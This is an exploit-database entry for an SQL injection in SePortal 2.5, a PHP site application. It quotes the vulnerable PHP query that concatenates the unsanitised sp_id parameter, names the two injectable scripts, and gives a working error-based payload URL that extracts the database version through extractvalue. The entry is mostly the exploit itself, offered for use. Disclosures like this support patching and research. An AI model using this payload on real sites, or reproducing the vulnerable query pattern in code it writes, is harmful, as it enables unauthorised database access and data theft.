SePortal 2.5 - SQL Injection Vulnerabilty

2014-03-19T00:00:00
ID 1337DAY-ID-22041
Type zdt
Reporter jsass
Modified 2014-03-19T00:00:00

Description

Exploit for php platform in category remote exploits

                                        
                                            SQL INJECTION Vulnerabilty
 
       code :
 $main_template = 'staticpages';
 
define('GET_CACHES', 1);
define('ROOT_PATH', './');
define('GET_USER_ONLINE', 1);
define('GET_STATS_BOX', 1);
include(ROOT_PATH.'global.php');
require(ROOT_PATH.'includes/sessions.php');
 
  $sql = "SELECT *
          FROM ".STATICPAGE_TABLE."
          WHERE sp_id = '".$sp_id."'";
  $result = $site_db->query($sql);
 
      files:
  staticpages.php?sp_id=(inject here)
  print.php?mode=staticpage&client=printer&sp_id=(inject here)
 
example:
 
http://localhost/seportal2.5/staticpages.php?sp_id=1%27%20%20and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29--%20-
 
//////////////////////////////////////////////////////////////////////////////////

#  0day.today [2018-04-14]  #